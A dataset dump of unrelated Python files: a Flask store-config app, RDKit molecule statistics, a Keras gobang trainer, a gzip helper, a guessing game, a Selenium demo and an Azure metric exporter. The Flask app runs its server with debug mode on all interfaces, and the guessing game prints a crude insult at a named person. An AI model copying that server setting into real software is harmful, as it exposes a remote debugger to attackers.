validators=[DataRequired()])\n data = { \"routerName\": routerName, \"customer_pciAddress\": customer_pciAddress, \"customer_tenant\": customer_tenant,\n \"dns_servers\": dns_servers, \"entitlement_end_date\": entitlement_end_date, \"entitlement_mbs\": entitlement_mbs,\n \"interNodeSecurity\": interNodeSecurity, \"interRouterSecurity\": interRouterSecurity, \"location\": location,\n \"locationCoordinates\": locationCoordinates, \"management_loopback\": management_loopback,\n \"management_service_security\": management_service_security, \"management_tenant\": management_tenant,\n \"neighborhood_name\": neighborhood_name, \"ntp_servers\": ntp_servers, \"provider_gateway\": provider_gateway,\n \"provider_gateway\": provider_gateway, \"provider_pciAddress\": provider_pciAddress,\n \"provider_prefixLength\": provider_prefixLength, \"provider_tenant\": provider_tenant}\n submit = SubmitField('Upload Data')\n\n def validate_dns_servers(form, field):\n ip_list = field.data.split(',')\n for address in ip_list:\n try:\n IP(address)\n except:\n raise ValidationError(\"Invalid IP list\")\n\n def validate_ntp_servers(form, field):\n ip_list = field.data.split(',')\n for address in ip_list:\n try:\n IP(address)\n except:\n raise ValidationError(\"Invalid IP\")\n\n\n@app.route(\"/home\")\ndef home():\n \"\"\"Landing page.\"\"\"\n return render_template(\n 'home.html',\n nav=nav,\n title=\"Local Database UI\",\n description=\"Web interface for interacting with the Database.\"\n )\n\n@app.route(\"/search\", methods=['GET', 'POST'])\ndef search():\n form = SearchForm()\n if request.method == 'POST':\n return search_results(form)\n return render_template('search_new.html', nav=nav, form=form)\n\n@app.route('/results')\ndef search_results(search):\n results = []\n # print(f\"=============>Search data: {search.data}\")\n branch = search.data['search']\n print(f\"=============>Search data: {branch}, {type(branch)}\")\n if branch == '':\n results = file_handler.get_all()\n print(results)\n else:\n print(f\"=============>Search data: {results}, {type(results)}\")\n results = [file_handler.get_store_data(branch)['variables']]\n print(f\"=============>Search data: {results}, {type(results)}\")\n if not results:\n flash('No results found!')\n return redirect('/search')\n table = Results(results)\n table.border = True\n return render_template('results.html', nav=nav, table=table)\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n remove_list = [\"csrf_token\", \"submit\"]\n form = DataForm()\n if form.validate_on_submit():\n data = {}\n data['variables'] = request.form.to_dict()\n data['name'] = data['variables']['routerName']\n data['variables']['dns_servers'] = data['variables']['dns_servers'].strip()\n data['variables']['dns_servers'] = data['variables']['dns_servers'].split(\",\")\n data['variables']['ntp_servers'] = data['variables']['ntp_servers'].strip()\n data['variables']['ntp_servers'] = data['variables']['ntp_servers'].split(\",\")\n print(\"Form to JSON: {}\".format(data))\n try:\n [data['variables'].pop(key) for key in remove_list]\n except:\n print(f\"Error reading form {data}\")\n else:\n # flash('Attempting to upload data for storeNumber {} with data \\n {}'.format(\n # form.routerName.data, data))\n response = file_handler.write_json_to_yml(data)\n if response:\n return Response(response=json.dumps(data),\n status=200,\n mimetype='application/json')\n # return render_template('base.html', title='Upload Data')\n # redirect('/api/v1/stores/all')\n return render_template('form_new.html',\n nav=nav,\n # title='Upload Data',\n # description=\"Form to upload branch data.\",\n form=form,\n template=\"form-template\"\n )\n\n\n@app.route('/')\ndef base():\n return Response(response=json.dumps({\"Status\": \"UP\"}),\n status=200,\n mimetype='application/json')\n\n@app.route('/list', methods=['GET'])\ndef list_all():\n file_list = file_handler.list_files()\n print(file_list)\n # file_handler.convert_json_to_yaml(file_list['list'][0])\n return(file_list)\n\n\"\"\"\nhttp://localhost:5000/api/v1/stores?id=base\n\"\"\"\n@app.route('/api/v1/stores', methods=['GET'])\ndef query_by_storenumber():\n if 'id' in request.args:\n branch_file = str(request.args['id']) + '.yml'\n print(branch_file)\n file_list = list_all()\n print(file_list)\n if branch_file in file_list['list']:\n branch_data = file_handler.convert_yaml_to_json(branch_file)\n return(branch_data)\n return Response(response=branch_data,\n status=200,\n mimetype='application/json')\n return page_not_found(404)\n\n\n\"\"\"\ncurl --header \"Content-Type: application/json\" --request POST --data \\\n'{ \"variables\": {\"routerName\": \"01225\", \"storeId\": \"RIST05868P01\", \"location\": \"Burlington, MA\"}, \"name\": \"Instance_1\"}' \\\nhttp://localhost:5000/add\n\"\"\"\n@app.route('/api/v1/stores', methods=['POST'])\ndef insert_data():\n data = request.get_json()\n print(data)\n if data is None or data == {}:\n return Response(response=json.dumps({\"Error\": \"Invalid Input\"}),\n status=400,\n mimetype='application/json')\n if file_handler.write_json_to_yml(data):\n return Response(response=json.dumps({\"Success\": \"DB entry created\"}),\n status=200,\n mimetype='application/json')\n else:\n return Response(response=json.dumps({\"Error\": \"unable to write to file\"}),\n status=400,\n mimetype='application/json')\n\n\n@app.route('/update/', methods=['GET', 'POST'])\ndef update(id):\n branch_data = file_handler.get_store_data(id)['variables']\n if branch_data is None or branch_data == {}:\n return Response(response=json.dumps({\"Error\": \"Invalid Input\"}),\n status=400,\n mimetype='application/json')\n if branch_data:\n print(f\"====================>{id}, {request}, {branch_data}\")\n branch_data['dns_servers'] = \",\".join(branch_data['dns_servers'])\n branch_data['ntp_servers'] = \",\".join(branch_data['ntp_servers'])\n form = DataForm(data=branch_data)\n if request.method == 'POST' and form.validate_on_submit():\n file_handler.update_file(branch_data)\n return render_template('form_new.html',\n nav=nav,\n form=form,\n template=\"form-template\"\n )\n else:\n return Response(response=json.dumps({\"Error\": \"unable to update data\"}),\n status=400,\n mimetype='application/json')\n\n\n\"\"\"\ncurl -H \"Accept: application/json\" --request DELETE http://localhost:5000/delete\\?id=01225\ncurl -X \"DELETE\" http://localhost:5000/delete?id=01225\n\"\"\"\n@app.route('/api/v1/stores', methods=['DELETE'])\ndef delete_data():\n if 'id' in request.args:\n id = str(request.args['id'])\n file_handler.delete_file(id)\n return Response(response=json.dumps({\"Success\": \"DB entry removed\"}),\n status=200,\n mimetype='application/json')\n return page_not_found(404)\n\n@app.route('/delete/', methods=['GET', 'POST'])\ndef delete(id):\n try:\n file_handler.delete_file(id)\n return Response(response=json.dumps({\"Success\": \"DB entry removed\"}),\n status=200,\n mimetype='application/json')\n except:\n return page_not_found(404)\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return \"The resource could not be found.\", 404\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000, host='0.0.0.0')\n","sub_path":"provisioner/file-web-db/routes/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"464950810","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 14:30:23 2020\n\n@author: jacqu\n\nCompute statistics on 100k samples from cbas model \n\"\"\"\n\nimport os\nimport sys\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nif __name__ == \"__main__\":\n sys.path.append(os.path.join(script_dir, '..'))\n\nfrom rdkit import Chem\nfrom rdkit.Chem import Draw\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\n\nimport argparse\n\nfrom rdkit import Chem\nfrom rdkit.Chem import QED\nfrom rdkit.Chem import Draw\nfrom rdkit import DataStructs\nfrom rdkit.Chem import AllChem\nfrom scipy.spatial.distance import jaccard\n\nfrom sklearn.metrics import pairwise_distances\n\nfrom cairosvg import svg2pdf\n\n\n\nfrom eval.eval_utils import plot_csvs\nfrom utils import soft_mkdir\nfrom data_processing.comp_metrics import cycle_score, logP, qed\nfrom data_processing.sascorer import calculateScore\nfrom multiprocessing import Pool\n\nif __name__ == \"__main__\":\n \n optimol = pd.read_csv(os.path.join(script_dir,'..', 'cbas/slurm/results/big_new_lr/optimol_scored.csv'))\n try:\n multiobj = pd.read_csv(os.path.join(script_dir,'..', 'cbas/slurm/results/multiobj_big/multiobj_scored.csv'))\n except:\n pass\n gianni = pd.read_csv(os.path.join(script_dir,'..', 'data/fabritiis_docked.csv'))\n zinc = pd.read_csv(os.path.join(script_dir,'..', 'data/zinc_docked.csv'))\n \n threshold = 0.01\n \n def qeds(df):\n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n] # top 10 % statistics \n smiles= df.smile\n smiles = [s for s in smiles if Chem.MolFromSmiles(s) is not None]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n q = np.array([QED.default(m) for m in mols])\n \n return (np.mean(q), np.std(q))\n \n def sas(df):\n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n]\n smiles= df.smile\n smiles = [s for s in smiles if Chem.MolFromSmiles(s) is not None]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n q = np.array([calculateScore(m) for m in mols])\n \n return (np.mean(q), np.std(q))\n \n def docking(df): \n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n] # top 10 % statistics \n scores = df.score\n return (np.mean(scores), np.std(scores))\n \n def tanim_dist(df):\n N=df.shape[0]\n n =int(N*threshold)\n df=df.sort_values('score')\n df=df[:n] # top 10 % statistics \n smiles= df.smile\n smiles = [s for s in smiles if Chem.MolFromSmiles(s) is not None]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n fps = [AllChem.GetMorganFingerprintAsBitVect(m , 3, nBits=2048) for m in mols]\n fps= np.array(fps)\n D= pairwise_distances(fps, metric = 'jaccard')\n \n return (np.mean(D), np.std(D))\n \n # ZINC : \n \"\"\"\n print('*********** ZINC ********')\n \n qed_zinc = qeds(zinc)\n print(qed_zinc)\n sa_zinc = sas(zinc)\n print(sa_zinc)\n docking_zinc = docking(zinc)\n print(docking_zinc)\n \n div_zinc = tanim_dist(zinc)\n print(div_zinc)\n \n # Gianni \n print('*********** Gianni ********')\n qed_gianni = qeds(gianni)\n print(qed_gianni)\n sa_gianni = sas(gianni)\n print(sa_gianni)\n docking_gianni = docking(gianni)\n print(docking_gianni)\n div_gianni= tanim_dist(gianni)\n print(div_gianni)\n \n # Optimol \n print('*********** Optimol ********')\n qed_o = qeds(optimol)\n print(qed_o)\n sa_o = sas(optimol)\n print(sa_o)\n docking_o = docking(optimol)\n print(docking_o)\n div_o = tanim_dist(optimol)\n print(div_o)\n \n # Multiobj : TODO \n print('*********** Multiobj: todo ********')\n qed_m = qeds(multiobj)\n print(qed_m)\n sa_m = sas(multiobj)\n print(sa_m)\n docking_m = docking(multiobj)\n print(docking_m)\n div_m = tanim_dist(multiobj)\n print(div_m)\n \n \n ### Searching for actives : \n \n actives = pd.read_csv(os.path.join(script_dir,'..','data','excape_drd3.csv'))\n actives = actives[actives['active']=='A']\n actives=actives.smile\n a_mols = [Chem.MolFromSmiles(s) for s in actives]\n a_smiles = [Chem.MolToSmiles(m) for m in a_mols if m is not None]\n a_smiles = set(a_smiles)\n \n cpt = 0\n found = []\n for s in smiles : \n s= Chem.MolToSmiles(Chem.MolFromSmiles(s)) # canonical\n if s in a_smiles : \n cpt +=1\n found.append(s)\n print(cpt, ' actives found in samples: ')\n print(found)\n \"\"\"\n \n N = 24\n seed = 4264\n \n # Plot : 2500 first : \n optimol = pd.read_csv(os.path.join(script_dir,'..', 'cbas/slurm/results/big_new_lr/optimol_scored.csv'))\n optimol = optimol[:10000]\n optimol = optimol.sample(N, random_state = seed)\n \n \n # Top molecules \n samples = optimol.sort_values('score')\n smiles, scores = samples.smile, samples.score\n \n smiles = smiles[:N]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n qeds = np.array([QED.default(m) for m in mols])\n sas = [calculateScore(m) for m in mols]\n scores = scores[:N]\n \n smi_for_csv = smiles\n scores_for_csv= scores\n \n df = pd.DataFrame.from_dict({'smiles':smi_for_csv, 'score': scores_for_csv})\n df.to_csv('plots/optimol_samples_smiles.csv')\n \n img = Draw.MolsToGridImage(mols, molsPerRow= 3, useSVG=True, legends = [f'{sc:.2f}, QED = {q:.2f}, SA = {s:.2f}' for sc,q,s in zip(scores,qeds, sas)])\n svg2pdf(str(img),write_to='plots/optimol_samp.pdf')\n\n # Top molecules multiobj\n multiobj = pd.read_csv(os.path.join(script_dir,'..', 'cbas/slurm/results/multiobj_big/multiobj_scored.csv'))\n multiobj = multiobj[:5000]\n multiobj = multiobj.sample(N, random_state = seed)\n \n samples = multiobj.sort_values('score')\n smiles, scores = samples.smile, samples.score\n \n smiles = smiles[:N]\n mols = [Chem.MolFromSmiles(s) for s in smiles]\n qeds = np.array([QED.default(m) for m in mols])\n print(qeds[:3])\n sas = [calculateScore(m) for m in mols]\n scores = scores[:N]\n \n img = Draw.MolsToGridImage(mols, molsPerRow= 3, useSVG=True, legends = [f'{sc:.2f}, QED = {q:.2f}, SA = {s:.2f}' for sc,q,s in zip(scores,qeds,sas)])\n svg2pdf(str(img),write_to='plots/multiobj_samp.pdf')\n \n smi_for_csv = smiles\n scores_for_csv = scores\n \n df = pd.DataFrame.from_dict({'smiles':smi_for_csv, 'score': scores_for_csv})\n df.to_csv('plots/multiobjective_samples_smiles.csv')\n","sub_path":"eval/analyze_samples.py","file_name":"analyze_samples.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"398701457","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom pickle import Pickler, Unpickler\n\nprint(tf.__version__)\n\nEPOCHS = 200\nNUM_CHANNELS=128\nKERNEL_SIZE=(4,4)\nDROPOUT_RATE=0\nBATCHNORM=True\nBATCH_SIZE=128\nSPLIT=0.2\nCACHE=True\nREMOVE_DUPLICATES=False\nAVERAGE_DUPLICATES=True\n#DATAFILE=\"/home/doma945/amoba_teleport/temp_1000sim_medium\"\nDATAFILE=\"/home/doma945/amoba_teleport/temp_1000sim_big\"\n#DATAFILE=\"/home/doma945/amoba_teleport/temp_4000sim\"\nCACHEFILE = \"/home/zombori/tmp/amoba_cache.npz\"\n#CACHEFILE = \"/home/doma945/tmp/amoba_cache.npz\"\nNETWORK=\"linear\"\n\ndef load_history():\n # ===== load history file =====\n # Descriptions: containes the data collected in every Iteration\n modelFile = os.path.join(DATAFILE, \"trainhistory.pth.tar\")\n examplesFile = modelFile+\".examples\"\n trainhistory = []\n if not os.path.isfile(examplesFile):\n print(examplesFile)\n else:\n print(\"File with trainExamples found. Read it.\")\n with open(examplesFile, \"rb\") as f:\n for i in Unpickler(f).load():\n trainhistory.append(i)\n f.closed\n\n print(\"The trainhistory containes {} iteration of data\".format(len(trainhistory)))\n\n # ===== Extract data =====\n trainExamples = []\n for i,e in enumerate(trainhistory):\n trainExamples.extend(np.array(e))\n\n print(\"Number of all trainexamples: {}\".format(len(trainExamples)))\n return trainExamples\n\ndef remove_duplicates(xs, ps, vs):\n dict = {}\n for i in range(xs.shape[0]):\n s = str(xs[i])\n dict[s] = i\n\n indices = list(dict.values())\n xs2 = xs[indices]\n ps2 = ps[indices]\n vs2 = vs[indices]\n\n print(\"Reduced shapes {}, {}, {} to {}, {}, {}\".format(xs.shape, ps.shape, vs.shape, xs2.shape, ps2.shape, vs2.shape))\n return xs2, ps2, vs2\n\ndef average_duplicates(xs, ps, vs):\n dict = {}\n for i in range(xs.shape[0]):\n s = str(xs[i])\n if s in dict:\n dict[s][\"ps\"].append(ps[i])\n dict[s][\"vs\"].append(vs[i])\n else:\n dict[s] = {\"x\": xs[i], \"ps\": [ps[i]], \"vs\": [vs[i]]}\n xs2 = []\n ps2 = []\n vs2 = []\n for s in dict:\n xs2.append(dict[s][\"x\"])\n ps2.append(np.mean(dict[s][\"ps\"], axis=0))\n vs2.append(np.mean(dict[s][\"vs\"]))\n xs2 = np.array(xs2)\n ps2 = np.array(ps2)\n vs2 = np.array(vs2)\n\n print(\"Average: reduced shapes {}, {}, {} to {}, {}, {}\".format(xs.shape, ps.shape, vs.shape, xs2.shape, ps2.shape, vs2.shape))\n return xs2, ps2, vs2\n \n\ndef preprocess_data(cache=True):\n if cache and os.path.isfile(CACHEFILE):\n npz = np.load(CACHEFILE)\n xs = npz['xs']\n ps = npz['ps']\n vs = npz['vs']\n else: \n trainExamples = load_history()\n xs = []\n ps = []\n vs = []\n curPlayers = []\n for (allBoard, curPlayer, pi, action) in trainExamples:\n xs.append(allBoard)\n curPlayers.append(curPlayer)\n ps.append(pi)\n vs.append(action)\n xs = np.array(xs)\n curPlayers = np.array(curPlayers)\n ps = np.array(ps)\n vs = np.array(vs)\n\n board = np.expand_dims(xs[:,:,:,0], axis = 3)\n heur_channels = xs[:,:,:,1:]\n white_board = board * (board+1) -1\n black_board = board * (board-1) -1\n\n curPlayers = curPlayers.reshape((-1, 1, 1, 1))\n player_channel = curPlayers * np.ones_like(board) \n xs = np.concatenate([white_board, black_board, heur_channels, player_channel], axis=3)\n\n if AVERAGE_DUPLICATES:\n xs, ps, vs = average_duplicates(xs, ps, vs)\n elif REMOVE_DUPLICATES:\n xs, ps, vs = remove_duplicates(xs, ps, vs)\n np.savez(CACHEFILE, xs=xs, ps=ps, vs=vs)\n\n print(\"Input shape: \", xs.shape)\n print(\"Target policy shape: \", ps.shape)\n print(\"Target value shape: \", vs.shape)\n return (xs, ps, vs)\n\n\n(xs, ps, vs) = preprocess_data(cache=CACHE)\n\ndef show(i):\n x = xs[i]\n p = ps[i]\n white = (x[:,:,0]+1) / 2\n black = (x[:,:,1]+1) / 2\n player = x[0,0,10]\n board = white - black\n policy = p.reshape((12,4))\n value = vs[i]\n print(np.transpose(board))\n print(np.transpose(policy))\n print(\"value: \", value)\n print(\"player: \", player)\n\n\n# players = np.mean(xs[:,:,:,10], axis=(1,2))\n# print(len(players))\n# print(np.sum(players))\n\n\ninput_shape = xs.shape[1:]\npolicy_shape = ps.shape[1:]\npi_output_count = np.prod(policy_shape)\n\nif NETWORK==\"original\":\n inputs = keras.Input(shape=input_shape)\n outputs = inputs\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\")(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\")(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\", strides=(2,1))(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\", strides=(2,2))(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Flatten()(outputs)\n\n outputs_flat = layers.Flatten()(inputs)\n outputs_flat = layers.Dense(1512)(outputs_flat)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs_flat = layers.Dropout(DROPOUT_RATE)(outputs_flat)\n outputs_flat = layers.Dense(1256)(outputs_flat)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs_flat = layers.Dropout(DROPOUT_RATE)(outputs_flat)\n\n outputs = layers.Concatenate(axis=1)([outputs_flat, outputs])\n outputs = layers.Dense(1024)(outputs)\n outputs = layers.Dropout(DROPOUT_RATE)(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Dense(512)(outputs)\n outputs = layers.Dropout(DROPOUT_RATE)(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n pi = layers.Dense(pi_output_count, name=\"policy\")(outputs)\n v0 = layers.Dense(1)(outputs)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v0)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\nelif NETWORK==\"linear\":\n inputs = keras.Input(shape=input_shape)\n pi = layers.Conv2D(1, (1,1), padding=\"same\", name=\"conv1\")(inputs)\n pi = layers.Flatten(name=\"policy\")(pi)\n v = layers.Flatten()(inputs)\n # v = layers.Dense(1, activation=\"relu\")(v)\n v = layers.Dense(1)(v)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\nelif NETWORK==\"linear2\":\n inputs = keras.Input(shape=input_shape)\n pi = layers.Conv2D(10, (1,1), padding=\"same\", name=\"conv1\", activation=\"relu\")(inputs)\n pi = layers.Conv2D(1, (1,1), padding=\"same\", name=\"conv2\")(pi)\n pi = layers.Flatten(name=\"policy\")(pi)\n v = layers.Flatten()(inputs)\n # v = layers.Dense(1, activation=\"relu\")(v)\n v = layers.Dense(1)(v)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\nelif NETWORK==\"local\":\n inputs = keras.Input(shape=input_shape)\n outputs = layers.Conv2D(1, (3,3), padding=\"same\", name=\"conv1\")(inputs)\n pi = layers.Flatten(name=\"policy\")(outputs)\n v0 = layers.Dense(1)(pi)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v0)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\n \n# elif NETWORK==\"dense\": # todo two heads\n# model = keras.Sequential([\n# keras.layers.Flatten(input_shape=input_shape),\n# keras.layers.Dense(1128, activation='relu'),\n# keras.layers.Dense(1256, activation='relu'),\n# keras.layers.Dense(1128, activation='relu'),\n# keras.layers.Dense(output_count),\n# keras.layers.Reshape(output_shape)\n# ])\n\n\n \nloss = {\n \"policy\": keras.losses.CategoricalCrossentropy(from_logits=True),\n \"value\": keras.losses.MeanSquaredError(),\n}\nloss_weights = {\n \"policy\": 1,\n \"value\": 10,\n}\nmetrics = {\n \"policy\": ['categorical_accuracy',\n keras.metrics.TopKCategoricalAccuracy(2, \"top2\"),\n keras.metrics.TopKCategoricalAccuracy(3, \"top3\"),\n keras.metrics.TopKCategoricalAccuracy(4, \"top4\"),\n keras.metrics.TopKCategoricalAccuracy(5, \"top5\")],\n \"value\": 'mse',\n}\n\n# prob = layers.Softmax()(pi)\n# model = keras.Model(inputs=inputs, outputs=prob)\n# loss = keras.losses.MeanSquaredError()\n\nmodel.compile(optimizer=\"adam\",\n loss=loss,\n loss_weights=loss_weights,\n metrics=metrics\n)\n\nmodel.fit(xs, (ps, vs), epochs=EPOCHS, batch_size=BATCH_SIZE, validation_split=SPLIT, verbose=2)\n\nmylayer = model.get_layer(name=\"conv1\")\nmyweights = mylayer.trainable_weights[0]\nmyweights = myweights.numpy()[:,:,:,0]\nprint(myweights.shape)\nfor i in range(11):\n print(\"Filter \", i)\n print(myweights[:,:,i])\n\n\n\nclass Model_Arena:\n def get_input_for_model(self, board, player):\n mtx = self.heuristic.get_field_stregth_mtx(board, 1)\n heuristic_components = self.heuristic.get_x_line_mtx(board, 1)\n shape = list(np.shape(board))+[1]\n white_board = board * (board+1) -1\n black_board = board * (board-1) -1\n player_channel = player*np.ones(shape)\n new_board = np.concatenate([np.reshape(white_board,shape),np.reshape(black_board,shape),\n np.reshape(mtx, shape),\n heuristic_components,\n player_channel], axis=2)\n return new_board\n\n def model_player(self,b,p, model):\n board = np.array([self.get_input_for_model(b, p)])\n valids = self.game.getValidMoves(b, 1)\n \n probs = model.predict(board)[0][0]\n move = np.argmax(probs*valids+valids*0.00001)\n #print(probs, move)\n return move\n \n def __init__(self, model):\n self.game = GobangGame(col=12, row=4, nir=7, defender=-1)\n self.heuristic = Heuristic(self.game)\n #heuristic_player = Heuristic(self.game).random_play\n heuristic_player = Heuristic(self.game).play\n model_player = lambda b, p: Model_Arena.model_player(self,b,p,model)\n self.arena = Arena.Arena(model_player, heuristic_player, self.game, display=display)\n\n def play(self, number_of_games=100):\n return self.arena.playGames(number_of_games, verbose=True) \n\nif 1:\n # === Ugly hack for reaching parent directory packages ===\n from inspect import getsourcefile\n import os.path\n import sys\n \n current_path = os.path.abspath(getsourcefile(lambda:0))\n current_dir = os.path.dirname(current_path)\n parent_dir = current_dir[:current_dir.rfind(os.path.sep)]\n\n sys.path.insert(0, parent_dir)\n # ========================================================\n\n import Arena\n from gobang.GobangGame import GobangGame, display\n from gobang.GobangPlayers import *\n from gobang.tensorflow.NNet import NNetWrapper as NNet\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n\n #set gpu memory grow\n config = tf.compat.v1.ConfigProto() \n config.gpu_options.allow_growth=True \n sess = tf.compat.v1.Session(config=config)\n\n arena = Model_Arena(model)\n print(arena.play())\n","sub_path":"supervised/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":11869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"642244556","text":"'''\nProject: Project Diamond\nTeam Team 2\nApp 3 Hashin\n'''\nimport json, sys, base64, logging, gzip, shutil\nfrom App5.curlfeed import CurlFeed\nclass App3JsonCompress:\n '''\n Create the Campress file\n '''\n logging.basicConfig(filename='App3JasonCompress.log', level = logging.ERROR)\n mlocation = ''\n olocation = ''\n\n def __init__(self,read,output):\n '''\n Parms read - read file location or name\n parms output file location name\n '''\n\n self.mlocation = read\n self.olocation = output\n\n def CompressFile(self):\n '''\n Compress the text file \n '''\n try :\n with open(self.mlocation,'rb') as f_in:\n with gzip.open(self.olocation,'wb') as f_out:\n print(\"Now compressing the JSON Payload\")\n shutil.copyfileobj(f_in, f_out)\n print(\"The file has been compressed\")\n curlFeed = CurlFeed(\"App3\", \"Success\", \"Compressed JSON file\")\n curlFeed.send()\n return True\n except:\n e = sys.exc_info()[0]\n logging.error(e)\n curlFeed = CurlFeed(\"App3\", \"Failed\", e)\n curlFeed.send()\n raise\n\n def getRead(self):\n '''\n Get the read location\n '''\n return self.mlocation\n\n def getOutput(self):\n '''\n Get the output location \n '''\n return self.olocation\n\n","sub_path":"IST411_Distributed_Object_Computing/Project_Diamond/App3/app3JsonCompress.py","file_name":"app3JsonCompress.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"194589728","text":"from random import random\nnum_ran=int(random()*20)\nguess=False\n\nprint(\"\"\"Welcome to this game,\nhere you must guess a number between 0 and 20\"\"\")\nwhile not guess:\n character=input(\"Please type a number \")\n if not character.isdigit():\n print(\"invalid characters\")\n else:\n number=int(character)\n if number<0 or number>20:\n print(\"you number must be between 0 and 20\") \n elif number==num_ran:\n guess=True;\n elif numbernum_ran:\n print(\"your number is greater\")\nprint(\"congratulations, you guessed \\nPD: Orlando es puto\")\n \n","sub_path":"testRandom.py","file_name":"testRandom.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"602938685","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndriver = webdriver.Chrome(executable_path=\"D:\\Drivers\\chromedriver_win32\\chromedriver.exe\")\n\ndriver.get(\"http://demo.automationtesting.in/Windows.html\")\n\nprint(driver.title) #returns the page title\n\nprint(driver.current_url) #returns url of page\n\ndriver.find_element_by_xpath(\"//*[@id='Tabbed']/a/button\").click()\n\ntime.sleep(5)\n\n#driver.close() will close only current browser\n\ndriver.quit() #will close all browsers","sub_path":"SeleniumSessions/BasicCommands.py","file_name":"BasicCommands.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"538263298","text":"# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\nimport logging\n\nfrom typing import Optional, Any\n\nfrom opentelemetry.sdk.metrics.export import (\n DataPointT,\n HistogramDataPoint,\n MetricExporter,\n MetricExportResult,\n MetricsData as OTMetricsData,\n NumberDataPoint,\n)\nfrom opentelemetry.sdk.resources import Resource\nfrom opentelemetry.sdk.util.instrumentation import InstrumentationScope\n\nfrom azure.monitor.opentelemetry.exporter import _utils\nfrom azure.monitor.opentelemetry.exporter._generated.models import (\n MetricDataPoint,\n MetricsData,\n MonitorBase,\n TelemetryItem,\n)\nfrom azure.monitor.opentelemetry.exporter.export._base import (\n BaseExporter,\n ExportResult,\n)\n\n_logger = logging.getLogger(__name__)\n\n__all__ = [\"AzureMonitorMetricExporter\"]\n\n\nclass AzureMonitorMetricExporter(BaseExporter, MetricExporter):\n \"\"\"Azure Monitor Metric exporter for OpenTelemetry.\"\"\"\n\n def __init__(self, **kwargs: Any) -> None:\n BaseExporter.__init__(self, **kwargs)\n MetricExporter.__init__(\n self,\n preferred_temporality=kwargs.get(\"preferred_temporality\"),\n preferred_aggregation=kwargs.get(\"preferred_aggregation\"),\n )\n\n def export(\n self,\n metrics_data: OTMetricsData,\n timeout_millis: float = 10_000, # pylint: disable=unused-argument\n **kwargs: Any, # pylint: disable=unused-argument\n ) -> MetricExportResult:\n \"\"\"Exports a batch of metric data\n :param metrics: Open Telemetry Metric(s) to export.\n :type metrics_data: Sequence[~opentelemetry.sdk.metrics._internal.point.MetricsData]\n :rtype: ~opentelemetry.sdk.metrics.export.MetricExportResult\n \"\"\"\n envelopes = []\n if metrics_data is None:\n return MetricExportResult.SUCCESS\n for resource_metric in metrics_data.resource_metrics:\n for scope_metric in resource_metric.scope_metrics:\n for metric in scope_metric.metrics:\n for point in metric.data.data_points:\n if point is not None:\n envelopes.append(\n self._point_to_envelope(\n point,\n metric.name,\n resource_metric.resource,\n scope_metric.scope\n )\n )\n try:\n result = self._transmit(envelopes)\n 